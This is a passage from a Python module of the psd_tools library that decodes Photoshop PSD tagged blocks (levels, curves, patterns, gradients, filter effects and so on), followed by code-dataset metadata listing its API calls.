Block(block.key, decoder(block.data, version=version))\n\n\ndef _decode_descriptor_block(data, kls):\n if isinstance(data, bytes):\n fp = io.BytesIO(data)\n version = read_fmt(\"I\", fp)[0]\n\n try:\n return kls(version, decode_descriptor(None, fp))\n except UnknownOSType as e:\n warnings.warn(\"Ignoring tagged block %s\" % e)\n return data\n\n\n@register(TaggedBlock.SOLID_COLOR_SHEET_SETTING)\ndef _decode_soco(data, **kwargs):\n return _decode_descriptor_block(data, SolidColorSetting)\n\n\n@register(TaggedBlock.PATTERN_FILL_SETTING)\ndef _decode_ptfl(data, **kwargs):\n return _decode_descriptor_block(data, PatternFillSetting)\n\n\n@register(TaggedBlock.GRADIENT_FILL_SETTING)\ndef _decode_grfl(data, **kwargs):\n return _decode_descriptor_block(data, GradientFillSetting)\n\n\n@register(TaggedBlock.BRIGHTNESS_AND_CONTRAST)\ndef _decode_brightness_and_contrast(data, **kwargs):\n return BrightnessContrast(*read_fmt(\"3H B\", io.BytesIO(data)))\n\n\n@register(TaggedBlock.LEVELS)\ndef _decode_levels(data, **kwargs):\n def read_level_record(fp):\n input_f, input_c, output_f, output_c, gamma = read_fmt(\"5H\", fp)\n return LevelRecord(\n input_f, input_c, output_f, output_c, gamma / 100.0)\n\n fp = io.BytesIO(data)\n version = read_fmt(\"H\", fp)[0]\n level_records = [read_level_record(fp) for i in range(29)]\n\n # decode extra level record, Photoshop CS (8.0) Additional information\n if fp.tell() < len(data):\n signature = read_fmt('4s', fp)[0]\n assert signature == b'Lvls', 'unexpected token: {0}'.format(signature)\n _ = read_fmt('H', fp)[0] # version (= 3)\n count = read_fmt('H', fp)[0] - 29\n level_records = level_records + [read_level_record(fp) for i in range(count)]\n\n return LevelsSettings(version, level_records)\n\n\n@register(TaggedBlock.CURVES)\ndef _decode_curves(data, **kwargs):\n fp = io.BytesIO(data)\n padding, version, count = read_fmt(\"B H I\", fp) # Documentation wrong.\n if version not in (1, 4):\n warnings.warn(\"Invalid curves version {}\".format(version))\n return data\n if version == 1:\n count = bin(count).count(\"1\") # Bitmap = channel index?\n\n items = []\n for i in range(count):\n point_count = read_fmt(\"H\", fp)[0]\n points = [read_fmt(\"2H\", fp) for c in range(point_count)]\n items.append(CurveData(None, points))\n extra = None\n if version == 1:\n tag, version_, count_ = read_fmt(\"4s H I\", fp)\n extra_items = []\n for i in range(count_):\n channel_index, point_count = read_fmt(\"2H\", fp)\n points = [read_fmt(\"2H\", fp) for c in range(point_count)]\n extra_items.append(CurveData(channel_index, points))\n extra = CurvesExtraMarker(tag, version_, count_, extra_items)\n return CurvesSettings(version, count, items, extra)\n\n\n@register(TaggedBlock.EXPOSURE)\ndef _decode_exposure(data, **kwargs):\n return Exposure(*read_fmt(\"H 3f\", io.BytesIO(data)))\n\n\n@register(TaggedBlock.VIBRANCE)\ndef _decode_vibrance(data, **kwargs):\n return _decode_descriptor_block(data, Vibrance)\n\n\n@register(TaggedBlock.HUE_SATURATION_V4)\n@register(TaggedBlock.HUE_SATURATION)\ndef _decode_hue_saturation(data, **kwargs):\n fp = io.BytesIO(data)\n version, enable_colorization, _ = read_fmt('H 2B', fp)\n if version != 2:\n warnings.warn(\"Invalid Hue/saturation version {}\".format(version))\n return data\n colorization = read_fmt(\"3h\", fp)\n master = read_fmt(\"3h\", fp)\n items = []\n for i in range(6):\n range_values = read_fmt(\"4h\", fp)\n settings_values = read_fmt(\"3h\", fp)\n items.append(HueSaturationData(range_values, settings_values))\n return HueSaturation(version, enable_colorization, colorization, master,\n items)\n\n\n@register(TaggedBlock.COLOR_BALANCE)\ndef _decode_color_balance(data, **kwargs):\n # Undocumented, following PhotoFilter format.\n fp = io.BytesIO(data)\n shadows = read_fmt(\"3h\", fp)\n midtones = read_fmt(\"3h\", fp)\n highlights = read_fmt(\"3h\", fp)\n preserve_luminosity = read_fmt(\"B\", fp)[0]\n return ColorBalance(shadows, midtones, highlights, preserve_luminosity)\n\n\n@register(TaggedBlock.BLACK_AND_WHITE)\ndef _decode_black_white(data, **kwargs):\n return _decode_descriptor_block(data, BlackWhite)\n\n\n@register(TaggedBlock.PHOTO_FILTER)\ndef _decode_photo_filter(data, **kwargs):\n fp = io.BytesIO(data)\n version = read_fmt(\"H\", fp)[0]\n if version not in (2, 3):\n warnings.warn(\"Invalid Photo Filter version {}\".format(version))\n return data\n if version == 3:\n xyz = read_fmt(\"3I\", fp)\n color_space = None\n color_components = None\n else:\n xyz = None\n color_space = read_fmt(\"H\", fp)[0]\n color_components = read_fmt(\"4H\", fp)\n density, preserve_luminosity = read_fmt(\"I B\", fp)\n return PhotoFilter(version, xyz, color_space, color_components,\n density, preserve_luminosity)\n\n\n@register(TaggedBlock.CHANNEL_MIXER)\ndef _decode_channel_mixer(data, **kwargs):\n fp = io.BytesIO(data)\n version, monochrome = read_fmt(\"2H\", fp)\n settings = read_fmt(\"5H\", fp)\n return ChannelMixer(version, monochrome, settings)\n\n\n@register(TaggedBlock.COLOR_LOOKUP)\ndef _decode_color_lookup(data, **kwargs):\n fp = io.BytesIO(data)\n version, descriptor_version = read_fmt(\"H I\", fp)\n\n try:\n return ColorLookup(version, descriptor_version,\n decode_descriptor(None, fp))\n except UnknownOSType as e:\n warnings.warn(\"Ignoring tagged block %s\" % e)\n return data\n\n\n@register(TaggedBlock.INVERT)\ndef _decode_invert(data, **kwargs):\n return Invert()\n\n\n@register(TaggedBlock.POSTERIZE)\ndef _decode_posterize(data, **kwargs):\n return Posterize(read_fmt(\"2H\", io.BytesIO(data))[0])\n\n\n@register(TaggedBlock.THRESHOLD)\ndef _decode_threshold(data, **kwargs):\n return Threshold(read_fmt(\"2H\", io.BytesIO(data))[0])\n\n\n@register(TaggedBlock.SELECTIVE_COLOR)\ndef _decode_selective_color(data, **kwargs):\n fp = io.BytesIO(data)\n version, method = read_fmt(\"2H\", fp)\n if version != 1:\n warnings.warn(\"Invalid Selective Color version %s\" % (version))\n return data\n items = [read_fmt(\"4h\", fp) for i in range(10)]\n return SelectiveColor(version, method, items)\n\n\n@register(TaggedBlock.PATTERNS1)\n@register(TaggedBlock.PATTERNS2)\n@register(TaggedBlock.PATTERNS3)\ndef _decode_patterns(data, **kwargs):\n fp = io.BytesIO(data)\n patterns = []\n while fp.tell() < len(data) - 4:\n length = read_fmt(\"I\", fp)[0]\n if length == 0:\n break\n patterns.append(_decode_pattern(fp.read(length)))\n extra_bytes = fp.tell() % 4\n if extra_bytes:\n fp.read(4 - extra_bytes) # 4-bytes padding.\n return patterns\n\n\ndef _decode_pattern(data):\n fp = io.BytesIO(data)\n version, image_mode = read_fmt(\"2I\", fp)\n if version != 1:\n warnings.warn(\"Unsupported patterns version %s\" % (version))\n return data\n\n point = read_fmt(\"2h\", fp)\n name = read_unicode_string(fp)\n pattern_id = read_pascal_string(fp, 'ascii')\n color_table = None\n if image_mode == ColorMode.INDEXED:\n color_table = [read_fmt(\"3B\", fp) for i in range(256)]\n read_fmt('4B', fp) # Undocumented field here...\n vma_list = _decode_virtual_memory_array_list(fp)\n return Pattern(version, image_mode, point, name, pattern_id, color_table,\n vma_list)\n\n\ndef _decode_virtual_memory_array_list(fp):\n version, length = read_fmt(\"2I\", fp)\n if version != 3:\n warnings.warn(\"Unsupported virtual memory array list %s\" % (version))\n return None\n start = fp.tell()\n rectangle = read_fmt(\"4I\", fp)\n num_channels = read_fmt(\"I\", fp)[0]\n channels = []\n for i in range(num_channels + 2):\n is_written = read_fmt(\"I\", fp)[0]\n if is_written == 0:\n continue\n array_length = read_fmt(\"I\", fp)[0]\n if array_length == 0:\n continue\n depth = read_fmt(\"I\", fp)[0]\n array_rect = read_fmt(\"4I\", fp)\n pixel_depth, compression = read_fmt(\"H B\", fp)\n channel_data = RawData(fp.read(array_length - 23))\n channels.append(VirtualMemoryArray(is_written, depth, array_rect,\n pixel_depth, compression, channel_data))\n return VirtualMemoryArrayList(version, rectangle, channels)\n\n\n@register(TaggedBlock.GRADIENT_MAP_SETTING)\ndef _decode_gradient_settings(data, **kwargs):\n fp = io.BytesIO(data)\n version, is_reversed, is_dithered = read_fmt(\"H 2B\", fp)\n if version != 1:\n warnings.warn(\"Invalid Gradient settings version %s\" % (version))\n return data\n name = read_unicode_string(fp)\n color_count = read_fmt(\"H\", fp)[0]\n color_stops = []\n for i in range(color_count):\n location, midpoint, mode = read_fmt(\"2i H\", fp)\n color = read_fmt(\"4H\", fp)\n color_stops.append(ColorStop(location, midpoint, mode, color))\n read_fmt(\"H\", fp) # Undocumented pad.\n transparency_count = read_fmt(\"H\", fp)[0]\n transparency_stops = []\n for i in range(transparency_count):\n transparency_stops.append(read_fmt(\"2I H\", fp))\n\n expansion, interpolation, length, mode = read_fmt(\"4H\", fp)\n if expansion != 2 or length != 32:\n warnings.warn(\"Ignoring Gradient settings\")\n return data\n random_seed, show_transparency, use_vector_color = read_fmt(\"I 2H\", fp)\n roughness, color_model = read_fmt(\"I H\", fp)\n minimum_color = read_fmt(\"4H\", fp)\n maximum_color = read_fmt(\"4H\", fp)\n read_fmt(\"H\", fp) # Dummy pad.\n\n return GradientSettings(\n version, is_reversed, is_dithered, name, color_stops,\n transparency_stops, expansion, interpolation, length, mode,\n random_seed, show_transparency, use_vector_color, roughness,\n color_model, minimum_color, maximum_color)\n\n\n@register(TaggedBlock.EXPORT_DATA)\ndef _decode_extd(data, **kwargs):\n fp = io.BytesIO(data)\n version = read_fmt(\"I\", fp)[0]\n try:\n data = decode_descriptor(None, fp)\n return ExportData(version, data)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring extd tagged block (%s)\" % e)\n return data\n\n\n@register(TaggedBlock.REFERENCE_POINT)\ndef _decode_reference_point(data, **kwargs):\n return read_fmt(\"2d\", io.BytesIO(data))\n\n\n@register(TaggedBlock.SHEET_COLOR_SETTING)\ndef _decode_color_setting(data, **kwargs):\n return read_fmt(\"4H\", io.BytesIO(data))\n\n\n@register(TaggedBlock.SECTION_DIVIDER_SETTING)\ndef _decode_section_divider(data, **kwargs):\n tp, key = _decode_divider(data)\n return Divider(TaggedBlock.SECTION_DIVIDER_SETTING, tp, key)\n\n\n@register(TaggedBlock.NESTED_SECTION_DIVIDER_SETTING)\ndef _decode_section_divider(data, **kwargs):\n tp, key = _decode_divider(data)\n return Divider(TaggedBlock.NESTED_SECTION_DIVIDER_SETTING, tp, key)\n\n\ndef _decode_divider(data):\n fp = io.BytesIO(data)\n key = None\n tp = read_fmt(\"I\", fp)[0]\n if not SectionDivider.is_known(tp):\n warnings.warn(\"Unknown section divider type (%s)\" % tp)\n\n if len(data) == 12:\n sig = fp.read(4)\n if sig != b'8BIM':\n warnings.warn(\"Invalid signature in section divider block\")\n key = fp.read(4)\n\n return tp, key\n\n\n@register(TaggedBlock.PLACED_LAYER_DATA)\n@register(TaggedBlock.SMART_OBJECT_PLACED_LAYER_DATA)\ndef _decode_placed_layer(data, **kwargs):\n fp = io.BytesIO(data)\n type, version, descriptorVersion = read_fmt(\"4s I I\", fp)\n descriptor = decode_descriptor(None, fp)\n return descriptor.items\n\n\n@register(TaggedBlock.VECTOR_STROKE_DATA)\ndef _decode_vector_stroke_data(data, **kwargs):\n fp = io.BytesIO(data)\n version = read_fmt(\"I\", fp)[0]\n\n if version != 16:\n warnings.warn(\"Invalid vstk version %s\" % (version))\n return data\n\n try:\n data = decode_descriptor(None, fp)\n return VectorStrokeSetting(version, data)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring vstk tagged block (%s)\" % e)\n return data\n\n\n@register(TaggedBlock.VECTOR_STROKE_CONTENT_DATA)\ndef _decode_vector_stroke_content_data(data, **kwargs):\n fp = io.BytesIO(data)\n key, version = read_fmt(\"II\", fp)\n\n if version != 16:\n warnings.warn(\"Invalid vscg version %s\" % (version))\n return data\n\n try:\n descriptor = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring vscg tagged block (%s)\" % e)\n return data\n\n return VectorStrokeContentSetting(key, version, descriptor)\n\n\n@register(TaggedBlock.METADATA_SETTING)\ndef _decode_metadata(data, **kwargs):\n fp = io.BytesIO(data)\n items_count = read_fmt(\"I\", fp)[0]\n items = []\n\n for x in range(items_count):\n sig = fp.read(4)\n if sig != b'8BIM':\n warnings.warn(\"Invalid signature in metadata item (%s)\" % sig)\n\n key, copy_on_sheet, data_length = read_fmt(\"4s ? 3x I\", fp)\n\n data = fp.read(data_length)\n if data_length < 4+12:\n # descr_version is 4 bytes, descriptor is at least 12 bytes,\n # so data can't be a descriptor.\n descr_ver = None\n else:\n # try load data as a descriptor\n fp2 = io.BytesIO(data)\n descr_ver = read_fmt(\"I\", fp2)[0]\n try:\n data = decode_descriptor(None, fp2)\n except UnknownOSType as e:\n # FIXME: can it fail with other exceptions?\n descr_ver = None\n warnings.warn(\"Can't decode metadata item (%s)\" % e)\n\n items.append(MetadataItem(key, copy_on_sheet, descr_ver, data))\n\n return items\n\n\n@register(TaggedBlock.PROTECTED_SETTING)\ndef _decode_protected(data, **kwargs):\n flag = unpack(\"I\", data)[0]\n return ProtectedSetting(\n bool(flag & 1),\n bool(flag & 2),\n bool(flag & 4),\n )\n\n\n@register(TaggedBlock.LAYER_32)\ndef _decode_layer32(data, version=1, **kwargs):\n from psd_tools.reader import layers\n from psd_tools.decoder.decoder import decode_layers\n fp = io.BytesIO(data)\n layers = layers._read_layers(fp, 'latin1', 32, length=len(data), version=version)\n return decode_layers(layers, version)\n\n\n@register(TaggedBlock.LAYER_16)\ndef _decode_layer16(data, version=1, **kwargs):\n from psd_tools.reader import layers\n from psd_tools.decoder.decoder import decode_layers\n fp = io.BytesIO(data)\n layers = layers._read_layers(fp, 'latin1', 16, length=len(data), version=version)\n return decode_layers(layers, version)\n\n\n@register(TaggedBlock.TYPE_TOOL_OBJECT_SETTING)\ndef _decode_type_tool_object_setting(data, **kwargs):\n fp = io.BytesIO(data)\n ver, xx, xy, yx, yy, tx, ty, txt_ver, descr1_ver = read_fmt(\"H 6d H I\", fp)\n\n # This decoder needs to be updated if we have new formats.\n if ver != 1 or txt_ver != 50 or descr1_ver != 16:\n warnings.warn(\"Ignoring type setting tagged block due to old versions\")\n return data\n\n try:\n text_data = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring type setting tagged block (%s)\" % e)\n return data\n\n # Decode EngineData here.\n for index in range(len(text_data.items)):\n item = text_data.items[index]\n if item[0] == b'EngineData':\n text_data.items[index] = (b'EngineData', engine_data.decode(item[1].value))\n\n warp_ver, descr2_ver = read_fmt(\"H I\", fp)\n if warp_ver != 1 or descr2_ver != 16:\n warnings.warn(\"Ignoring type setting tagged block due to old versions\")\n return data\n\n try:\n warp_data = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring type setting tagged block (%s)\" % e)\n return data\n\n left, top, right, bottom = read_fmt(\"4i\", fp) # wrong info in specs...\n return TypeToolObjectSetting(\n ver, xx, xy, yx, yy, tx, ty, txt_ver, descr1_ver, text_data,\n warp_ver, descr2_ver, warp_data, left, top, right, bottom\n )\n\n\n@register(TaggedBlock.CONTENT_GENERATOR_EXTRA_DATA)\ndef _decode_content_generator_extra_data(data, **kwargs):\n return _decode_descriptor_block(data, ContentGeneratorExtraData)\n\n\n@register(TaggedBlock.TEXT_ENGINE_DATA)\ndef _decode_text_engine_data(data, **kwargs):\n return engine_data.decode(data)\n\n\n@register(TaggedBlock.UNICODE_PATH_NAME)\ndef _decode_unicode_path_name(data, **kwargs):\n if data:\n return _decode_descriptor_block(data, UnicodePathName)\n else:\n warnings.warn(\"Empty Unicode Path Name\")\n return None\n\n\n@register(TaggedBlock.ANIMATION_EFFECTS)\ndef _decode_animation_effects(data, **kwargs):\n return _decode_descriptor_block(data, AnimationEffects)\n\n\n@register(TaggedBlock.FILTER_MASK)\ndef _decode_filter_mask(data, **kwargs):\n fp = io.BytesIO(data)\n color = decode_color(fp)\n opacity = read_fmt(\"H\", fp)[0]\n return FilterMask(color, opacity)\n\n\n@register(TaggedBlock.VECTOR_ORIGINATION_DATA)\ndef _decode_vector_origination_data(data, **kwargs):\n fp = io.BytesIO(data)\n ver, descr_ver = read_fmt(\"II\", fp)\n\n if ver != 1 and descr_ver != 16:\n warnings.warn(\"Invalid vmsk version %s %s\" % (ver, descr_ver))\n return data\n\n try:\n vector_origination_data = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring vector origination tagged block (%s)\" % e)\n return data\n\n return VectorOriginationData(ver, descr_ver, vector_origination_data)\n\n\n@register(TaggedBlock.PIXEL_SOURCE_DATA1)\ndef _decode_pixel_source_data1(data, **kwargs):\n return _decode_descriptor_block(data, PixelSourceData)\n\n\n@register(TaggedBlock.PIXEL_SOURCE_DATA2)\ndef _decode_pixel_source_data2(data, **kwargs):\n fp = io.BytesIO(data)\n length = read_fmt(\"Q\", fp)\n return fp.read(length)\n\n\n@register(TaggedBlock.VECTOR_MASK_SETTING1)\n@register(TaggedBlock.VECTOR_MASK_SETTING2)\ndef _decode_vector_mask_setting1(data, **kwargs):\n fp = io.BytesIO(data)\n ver, flags = read_fmt(\"II\", fp)\n\n # This decoder needs to be updated if we have new formats.\n if ver != 3:\n warnings.warn(\"Ignoring vector mask setting1 tagged block due to \"\n \"unsupported version %s\" % (ver))\n return data\n\n path = decode_path_resource(fp.read())\n return VectorMaskSetting(\n ver, (0x01 & flags) > 0, (0x02 & flags) > 0, (0x04 & flags) > 0, path)\n\n\n@register(TaggedBlock.ARTBOARD_DATA1)\n@register(TaggedBlock.ARTBOARD_DATA2)\n@register(TaggedBlock.ARTBOARD_DATA3)\ndef _decode_artboard_data(data, **kwargs):\n return _decode_descriptor_block(data, ArtboardData)\n\n\n@register(TaggedBlock.PLACED_LAYER_OBSOLETE1)\n@register(TaggedBlock.PLACED_LAYER_OBSOLETE2)\ndef _decode_placed_layer(data, **kwargs):\n fp = io.BytesIO(data)\n type_, version = read_fmt(\"2I\", fp)\n if version != 3:\n warnings.warn(\"Unsupported placed layer version %s\" % (version))\n return data\n uuid = read_pascal_string(fp, \"ascii\")\n page, total_pages, anti_alias, layer_type = read_fmt(\"4I\", fp)\n transformation = read_fmt(\"8d\", fp)\n warp_version, warp_desc_version = read_fmt(\"2I\", fp)\n descriptor = decode_descriptor(None, fp)\n warp = WarpInformation(warp_version, warp_desc_version, descriptor)\n return PlacedLayerObsolete(type_, version, uuid, page, total_pages,\n anti_alias, layer_type, transformation, warp)\n\n\n@register(TaggedBlock.LINKED_LAYER1)\n@register(TaggedBlock.LINKED_LAYER2)\n@register(TaggedBlock.LINKED_LAYER3)\n@register(TaggedBlock.LINKED_LAYER_EXTERNAL)\ndef _decode_linked_layer(data, **kwargs):\n from psd_tools.decoder.linked_layer import decode\n return decode(data)\n\n\n@register(TaggedBlock.CHANNEL_BLENDING_RESTRICTIONS_SETTING)\ndef _decode_channel_blending_restrictions_setting(data, **kwargs):\n # Data contains color channels to restrict.\n restrictions = [False, False, False]\n fp = io.BytesIO(data)\n while fp.tell() < len(data):\n channel = read_fmt(\"I\", fp)[0]\n restrictions[channel] = True\n return restrictions\n\n\n@register(TaggedBlock.USER_MASK)\ndef _decode_user_mask(data, **kwargs):\n fp = io.BytesIO(data)\n color = decode_color(fp)\n opacity, flag = read_fmt(\"H B\", fp)\n return UserMask(color, opacity, flag)\n\n\n@register(TaggedBlock.FILTER_EFFECTS1)\n@register(TaggedBlock.FILTER_EFFECTS2)\n@register(TaggedBlock.FILTER_EFFECTS3)\ndef _decode_filter_effects(data, **kwargs):\n fp = io.BytesIO(data)\n version, length = read_fmt(\"I Q\", fp)\n if version not in (1, 2, 3):\n warnings.warn(\"Unknown filter effects version %d\" % version)\n return data\n\n return _decode_filter_effect_item(fp.read(length))\n\n\ndef _decode_filter_effect_item(data):\n fp = io.BytesIO(data)\n uuid = read_pascal_string(fp, \"ascii\")\n version, length = read_fmt(\"I Q\", fp)\n assert version == 1, \"Unknown filter effect version %d\" % version\n\n rectangle = read_fmt(\"4i\", fp)\n depth, max_channels = read_fmt(\"2I\", fp)\n\n channels = []\n for i in range(max_channels + 2):\n is_written = read_fmt(\"I\", fp)[0]\n assert is_written in (0, 1)\n if is_written:\n channel_len, compression = read_fmt(\"Q H\", fp)\n channel_data = fp.read(max(0, channel_len - 2))\n channels.append(FilterEffectChannel(is_written, compression,\n RawData(channel_data)))\n else:\n channels.append(FilterEffectChannel(is_written, 0, None))\n\n # There seems to be undocumented extra fields.\n extra_data = None\n if len(data) > fp.tell() and read_fmt(\"B\", fp)[0]:\n extra_rect = read_fmt(\"4i\", fp)\n extra_length, extra_compression = read_fmt(\"Q H\", fp)\n extra_data = (extra_rect, extra_compression,\n RawData(fp.read(extra_length)))\n\n return FilterEffects(uuid, version, rectangle, depth, max_channels,\n channels, extra_data)\n", "sub_path": "src/psd_tools/decoder/tagged_blocks.py", "file_name": "tagged_blocks.py", "file_ext": "py", "file_size_in_byte": 29581, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "psd_tools.decoder.decoders.new_registry", "line_number": 19, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 19, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLEND_CLIPPING_ELEMENTS", "line_number": 22, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 22, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLEND_INTERIOR_ELEMENTS", "line_number": 23, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 23, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLEND_FILL_OPACITY", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 24, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.KNOCKOUT_SETTING", "line_number": 25, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 25, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.UNICODE_LAYER_NAME", "line_number": 26, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 26, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_ID", "line_number": 27, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 27, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.EFFECTS_LAYER", "line_number": 28, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 28, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO", "line_number": 29, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 29, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V0", "line_number": 30, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 30, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V1", "line_number": 31, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 31, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.USING_ALIGNED_RENDERING", "line_number": 32, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 32, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_VERSION", "line_number": 33, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 33, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.TRANSPARENCY_SHAPES_LAYER", "line_number": 34, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 34, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_MASK_AS_GLOBAL_MASK", "line_number": 35, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 35, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_MASK_AS_GLOBAL_MASK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 36, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 22, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 22, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 23, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 23, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 24, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 24, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 25, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 25, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.unicode_string", "line_number": 26, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 26, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 27, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 27, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode", "line_number": 28, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 28, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode_object_based", "line_number": 29, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 29, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode_object_based", "line_number": 30, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 30, "usage_type": "name"}, {"api_name": "psd_tools.decoder.layer_effects.decode_object_based", "line_number": 31, "usage_type": "attribute"}, {"api_name": "psd_tools.decoder.layer_effects", "line_number": 31, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.boolean", "line_number": 32, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 32, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 33, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 33, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 34, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 34, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 35, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 35, "usage_type": "name"}, {"api_name": "psd_tools.decoder.decoders.single_value", "line_number": 36, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoders", "line_number": 36, "usage_type": "name"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 40, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 41, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 42, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 43, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 45, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 46, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 48, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 50, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 52, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 53, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 54, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 55, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 57, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 58, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 60, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 61, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 64, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 66, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 68, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 69, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 70, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 71, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 72, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 74, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 76, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 79, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 84, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 85, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 88, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 89, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 90, "usage_type": "call"}, {"api_name": 